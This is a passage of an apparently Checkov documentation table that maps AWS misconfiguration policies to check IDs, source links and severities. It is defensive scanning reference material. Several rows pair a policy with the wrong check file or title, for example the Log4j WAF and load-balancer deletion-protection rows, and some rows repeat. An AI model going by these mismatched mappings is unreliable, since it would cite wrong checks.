https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py[CKV_AWS_103] +|HIGH + + +|xref:bc-aws-general-97.adoc[AWS Kinesis Video Stream not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py[CKV_AWS_177] +|LOW + + +|xref:bc-aws-general-99.adoc[AWS FSX Windows filesystem not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py[CKV_AWS_179] +|LOW + + +|xref:bc-aws-logging-32.adoc[Postgres RDS does not have Query Logging enabled] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_27] +|MEDIUM + + +|xref:bc-aws-networking-62.adoc[Deletion protection disabled for load balancer] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py[CKV_AWS_113] +|MEDIUM + + +|xref:bc-aws-storage-1.adoc[AWS QLDB ledger has deletion protection is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py[CKV_AWS_172] +|LOW + + +|xref:ensure-api-gateway-caching-is-enabled.adoc[AWS API Gateway caching is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] +|LOW + + +|xref:ensure-aws-acm-certificates-has-logging-preference.adoc[AWS ACM certificates does not have logging preference] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py[CKV_AWS_234] +|LOW + + +|xref:ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc[AWS all data stored in the Elasticsearch domain is not 
encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py[CKV_AWS_247] +|LOW + + +|xref:ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc[AWS AMI copying does not use a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py[CKV_AWS_236] +|LOW + + +|xref:ensure-aws-ami-launch-permissions-are-limited.adoc[AWS AMI launch permissions are not limited] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py[CKV_AWS_205] +|LOW + + +|xref:ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc[AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMIEncryption.py[CKV_AWS_204] +|LOW + + +|xref:ensure-aws-api-deployments-enable-create-before-destroy.adoc[AWS API deployments do not enable Create before Destroy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py[CKV_AWS_217] +|LOW + + +|xref:ensure-aws-api-gateway-caching-is-enabled.adoc[AWS API Gateway caching is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] +|LOW + + +|xref:ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc[AWS API Gateway Domain does not use a modern security policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py[CKV_AWS_206] +|LOW + + +|xref:ensure-aws-api-gateway-enables-create-before-destroy.adoc[AWS API Gateway does not enable Create before Destroy] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py[CKV_AWS_237] +|LOW + + +|xref:ensure-aws-api-gateway-method-settings-enable-caching.adoc[AWS API Gateway method settings do not enable caching] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py[CKV_AWS_225] +|LOW + + +|xref:ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc[AWS App Flow connector profile does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py[CKV_AWS_264] +|LOW + + +|xref:ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc[AWS App Flow flow does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py[CKV_AWS_263] +|LOW + + +|xref:ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc[AWS Appsync API Cache is not encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py[CKV_AWS_214] +|LOW + + +|xref:ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc[AWS Appsync API Cache is not encrypted in transit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py[CKV_AWS_215] +|LOW + + +|xref:ensure-aws-appsync-has-field-level-logs-enabled.adoc[AWS AppSync has field-level logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py[CKV_AWS_194] +|LOW + + +|xref:ensure-aws-appsync-is-protected-by-waf.adoc[AWS AppSync is not protected by WAF] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml[CKV2_AWS_33] +|LOW + 
+ +|xref:ensure-aws-appsyncs-logging-is-enabled.adoc[AWS AppSync's logging is disabled] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py[CKV_AWS_193] +|LOW + + +|xref:ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc[AWS Lambda function URL AuthType set to NONE] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py[CKV_AWS_258] +|LOW + + +|xref:ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc[AWS Batch Job is defined as a privileged container] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py[CKV_AWS_210] +|LOW + + +|xref:ensure-aws-cloudfront-attached-wafv2-webacl-is-configured-with-amr-for-log4j-vulnerability.adoc[AWS CloudFront attached WAFv2 WebACL is not configured with AMR for Log4j vulnerability] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py[CKV_AWS_197] +|LOW + + +|xref:ensure-aws-cloudfront-distribution-is-enabled.adoc[AWS Cloudfront distribution is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py[CKV_AWS_216] +|LOW + + +|xref:ensure-aws-cloudfront-response-header-policy-enforces-strict-transport-security.adoc[AWS CloudFront response header policy does not enforce Strict Transport Security] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py[CKV_AWS_259] +|LOW + + +|xref:ensure-aws-cloudsearch-uses-https.adoc[AWS Cloudsearch does not use HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py[CKV_AWS_220] +|LOW + + +|xref:ensure-aws-cloudsearch-uses-the-latest-transport-layer-security-tls-1.adoc[AWS Cloudsearch does not use the latest (Transport 
Layer Security) TLS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py[CKV_AWS_218] +|LOW + + +|xref:ensure-aws-cloudtrail-defines-an-sns-topic.adoc[AWS CloudTrail does not define an SNS Topic] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py[CKV_AWS_252] +|LOW + + +|xref:ensure-aws-cloudtrail-logging-is-enabled.adoc[AWS CloudTrail logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py[CKV_AWS_251] +|LOW + + +|xref:ensure-aws-cluster-logging-is-encrypted-using-a-customer-managed-key-cmk.adoc[AWS cluster logging is not encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py[CKV_AWS_224] +|LOW + + +|xref:ensure-aws-code-artifact-domain-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc[AWS Code Artifact Domain is not encrypted by KMS using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py[CKV_AWS_221] +|LOW + + +|xref:ensure-aws-codecommit-branch-changes-have-at-least-2-approvals.adoc[AWS Codecommit branch changes have fewer than 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py[CKV_AWS_257] +|LOW + + +|xref:ensure-aws-codecommit-is-associated-with-an-approval-rule.adoc[AWS Codecommit is not associated with an approval rule] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml[CKV2_AWS_37] +|LOW + + +|xref:ensure-aws-codepipeline-artifactstore-is-not-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS CodePipeline 
artifactStore is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py[CKV_AWS_219] +|LOW + + +|xref:ensure-aws-config-must-record-all-possible-resources.adoc[AWS Config must record all possible resources] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml[CKV2_AWS_48] +|MEDIUM + + +|xref:ensure-aws-config-recorder-is-enabled-to-record-all-supported-resources.adoc[AWS Config Recording is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml[CKV2_AWS_45] +|MEDIUM + + +|xref:ensure-aws-copied-amis-are-encrypted.adoc[AWS copied AMIs are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py[CKV_AWS_235] +|LOW + + +|xref:ensure-aws-dax-cluster-endpoint-uses-transport-layer-security-tls.adoc[AWS DAX cluster endpoint does not use TLS (Transport Layer Security)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py[CKV_AWS_239] +|LOW + + +|xref:ensure-aws-db-instance-gets-all-minor-upgrades-automatically.adoc[AWS DB instance does not get all minor upgrades automatically] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py[CKV_AWS_226] +|LOW + + +|xref:ensure-aws-dlm-cross-region-events-are-encrypted-with-a-customer-managed-key-cmk.adoc[AWS DLM cross-region events are not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py[CKV_AWS_254] +|LOW + + +|xref:ensure-aws-dlm-cross-region-events-are-encrypted.adoc[AWS DLM cross-region events 
are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py[CKV_AWS_253] +|LOW + + +|xref:ensure-aws-dlm-cross-region-schedules-are-encrypted-using-a-customer-managed-key-cmk.adoc[AWS DLM cross-region schedules are not encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py[CKV_AWS_256] +|LOW + + +|xref:ensure-aws-dlm-cross-region-schedules-are-encrypted.adoc[AWS DLM cross-region schedules are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py[CKV_AWS_255] +|LOW + + +|xref:ensure-aws-dms-instance-receives-all-minor-updates-automatically.adoc[AWS DMS instance does not receive all minor updates automatically] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py[CKV_AWS_222] +|LOW + + +|xref:ensure-aws-ebs-volume-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS EBS Volume is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py[CKV_AWS_212] +|LOW + + +|xref:ensure-aws-ecs-cluster-enables-logging-of-ecs-exec.adoc[AWS ECS Cluster does not enable logging of ECS Exec] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py[CKV_AWS_223] +|LOW + + +|xref:ensure-aws-elasticache-redis-cluster-with-multi-az-automatic-failover-feature-set-to-enabled.adoc[AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to disabled] +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml[CKV2_AWS_50] +|MEDIUM + + +|xref:ensure-aws-elasticsearch-domain-uses-an-updated-tls-policy.adoc[AWS Elasticsearch domain does not use an updated TLS policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py[CKV_AWS_228] +|LOW + + +|xref:ensure-aws-fsx-openzfs-file-system-is-encrypted-by-aws-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS FSx OpenZFS file system is not encrypted by AWS Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py[CKV_AWS_203] +|LOW + + +|xref:ensure-aws-glue-component-is-associated-with-a-security-configuration.adoc[AWS Glue component is not associated with a security configuration] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py[CKV_AWS_195] +|LOW + + +|xref:ensure-aws-guardduty-detector-is-enabled.adoc[AWS GuardDuty detector is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py[CKV_AWS_238] +|LOW + + +|xref:ensure-aws-image-builder-distribution-configuration-is-encrypting-ami-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS Image Builder Distribution Configuration is not encrypting AMI by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py[CKV_AWS_199] +|LOW + + +|xref:ensure-aws-image-recipe-ebs-disk-are-encrypted-using-a-customer-managed-key-cmk.adoc[AWS Image Recipe EBS Disk are not encrypted using a Customer Managed Key (CMK)] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py[CKV_AWS_200] +|LOW + + +|xref:ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks-1.adoc[AWS Kendra index Server side encryption does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py[CKV_AWS_262] +|LOW + + +|xref:ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks.adoc[AWS HTTP and HTTPS target groups do not define health check] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py[CKV_AWS_261] +|LOW + + +|xref:ensure-aws-key-management-service-kms-key-is-enabled.adoc[AWS Key Management Service (KMS) key is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py[CKV_AWS_227] +|LOW + + +|xref:ensure-aws-keyspace-table-uses-customer-managed-keys-cmks.adoc[AWS Keyspace Table does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py[CKV_AWS_265] +|LOW + + +|xref:ensure-aws-kinesis-firehose-delivery-streams-are-encrypted-with-cmk.adoc[AWS Kinesis Firehose Delivery Streams are not encrypted with CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py[CKV_AWS_241] +|LOW + + +|xref:ensure-aws-kinesis-firehoses-delivery-stream-is-encrypted.adoc[AWS Kinesis Firehose's delivery stream is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py[CKV_AWS_240] +|LOW + + +|xref:ensure-aws-memorydb-data-is-encrypted-in-transit.adoc[AWS MemoryDB data is not encrypted in transit] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py[CKV_AWS_202] +|LOW + + +|xref:ensure-aws-memorydb-is-encrypted-at-rest-by-aws-key-management-service-kms-using-cmks.adoc[AWS MemoryDB is not encrypted at rest by AWS' Key Management Service KMS using CMKs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py[CKV_AWS_201] +|LOW + + +|xref:ensure-aws-mqbroker-audit-logging-is-enabled.adoc[AWS MQBroker audit logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py[CKV_AWS_197] +|LOW + + +|xref:ensure-aws-mqbroker-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS MQBroker is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py[CKV_AWS_209] +|LOW + + +|xref:ensure-aws-mqbroker-version-is-up-to-date.adoc[AWS MQBroker version is not up to date] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerVersion.py[CKV_AWS_208] +|LOW + + +|xref:ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc[AWS MQBroker's minor version updates are disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py[CKV_AWS_207] +|LOW + + +|xref:ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc[AWS MWAA environment has scheduler logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py[CKV_AWS_242] +|LOW + + +|xref:ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc[AWS MWAA environment has webserver logs disabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py[CKV_AWS_244] +|LOW + + +|xref:ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc[AWS MWAA environment has worker logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py[CKV_AWS_243] +|LOW + + +|xref:ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc[AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py[CKV_AWS_246] +|LOW + + +|xref:ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc[AWS RDS DB snapshot does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py[CKV_AWS_266] +|LOW + + +|xref:ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc[AWS RDS PostgreSQL exposed to local file read vulnerability] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py[CKV_AWS_250] +|LOW + + +|xref:ensure-aws-rds-uses-a-modern-cacert.adoc[AWS RDS does not use a modern CaCert] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py[CKV_AWS_211] +|LOW + +|xref:ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py[CKV_AWS_245] 
+|LOW + + +|xref:ensure-aws-ssm-parameter-is-encrypted.adoc[AWS SSM Parameter is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV2_AWS_34] +|LOW + + +|xref:ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc[AWS Terraform sends SSM secrets to untrusted domains over HTTP] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml[CKV2_AWS_36] +|LOW + + +|xref:ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc[Backup Vault is not encrypted at rest using KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py[CKV_AWS_166] +|MEDIUM + + +|xref:ensure-docdb-has-audit-logs-enabled.adoc[DocDB does not have audit logs enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py[CKV_AWS_104] +|LOW + + +|xref:ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc[Dynamodb point in time recovery is not enabled for global tables] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py[CKV_AWS_165] +|MEDIUM + + +|xref:ensure-ebs-default-encryption-is-enabled.adoc[AWS EBS volume region with encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py[CKV_AWS_106] +|MEDIUM + + +|xref:ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc[AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py[CKV_AWS_171] +|MEDIUM + + +|xref:ensure-fx-ontap-file-system-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc[AWS fx ontap file system 
not encrypted using Customer Managed Key] +|https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py[CKV_AWS_178] +|LOW + + +|xref:ensure-glacier-vault-access-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc[Glacier Vault access policy is public and not restricted to specific services or principals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py[CKV_AWS_167] +|MEDIUM + + +|xref:ensure-guardduty-is-enabled-to-specific-orgregion.adoc[GuardDuty is not enabled to specific org/region] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml[CKV2_AWS_3] +|LOW + + +|xref:ensure-postgres-rds-has-query-logging-enabled.adoc[AWS Postgres RDS has Query Logging disabled] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_30] +|LOW + + +|xref:ensure-provisioned-resources-are-not-manually-modified.adoc[Provisioned resources are manually modified] +|Not Supported +|HIGH + + +|xref:ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc[QLDB ledger permissions mode is not set to STANDARD] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py[CKV_AWS_170] +|MEDIUM + + +|xref:ensure-redshift-uses-ssl.adoc[AWS Redshift does not have require_ssl configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedShiftSSL.py[CKV_AWS_105] +|MEDIUM + + +|xref:ensure-route53-a-record-has-an-attached-resource.adoc[Route53 A Record does not have Attached Resource] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml[CKV2_AWS_23] +|MEDIUM + + 
+|xref:ensure-session-manager-data-is-encrypted-in-transit.adoc[Session Manager data is not encrypted in transit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py[CKV_AWS_112] +|MEDIUM + + +|xref:ensure-session-manager-logs-are-enabled-and-encrypted.adoc[Session Manager logs are not enabled and encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py[CKV_AWS_113] +|MEDIUM + + +|xref:ensure-sns-topic-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc[SNS topic policy is public and access is not restricted to specific services or principals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py[CKV_AWS_169] +|MEDIUM + + +|xref:ensure-sqs-queue-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc[SQS queue policy is public and access is not restricted to specific services or principals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py[CKV_AWS_168] +|HIGH + + +|xref:ensure-that-amazon-elasticache-redis-clusters-have-automatic-backup-turned-on.adoc[Amazon ElastiCache Redis clusters do not have automatic backup turned on] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py[CKV_AWS_134] +|LOW + + +|xref:ensure-that-athena-workgroup-is-encrypted.adoc[Athena Workgroup is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py[CKV_AWS_159] +|MEDIUM + + +|xref:ensure-that-auto-scaling-is-enabled-on-your-dynamodb-tables.adoc[DynamoDB Tables do not have Auto Scaling enabled] +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml[CKV2_AWS_16] +|LOW + + +|xref:ensure-that-aws-lambda-function-is-configured-for-a-dead-letter-queue-dlq.adoc[AWS Lambda function is not configured for a DLQ] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py[CKV_AWS_116] +|LOW + + +|xref:ensure-that-aws-lambda-function-is-configured-for-function-level-concurrent-execution-limit.adoc[AWS Lambda function is not configured for function-level concurrent execution Limit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py[CKV_AWS_115] +|LOW + + +|xref:ensure-that-aws-lambda-function-is-configured-inside-a-vpc-1.adoc[AWS Lambda Function is not assigned to access within VPC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaInVPC.py[CKV_AWS_117] +|LOW + + +|xref:ensure-that-cloudwatch-log-group-is-encrypted-by-kms.adoc[AWS CloudWatch Log groups encrypted using default encryption key instead of KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py[CKV_AWS_158] +|LOW + + +|xref:ensure-that-codebuild-projects-are-encrypted-1.adoc[CodeBuild projects are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeBuildEncrypted.py[CKV_AWS_147] +|MEDIUM + + +|xref:ensure-that-dynamodb-tables-are-encrypted.adoc[Unencrypted DynamoDB Tables] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py[CKV_AWS_119] +|LOW + + +|xref:ensure-that-ebs-are-added-in-the-backup-plans-of-aws-backup.adoc[EBS does not have an AWS Backup backup plan] +| 
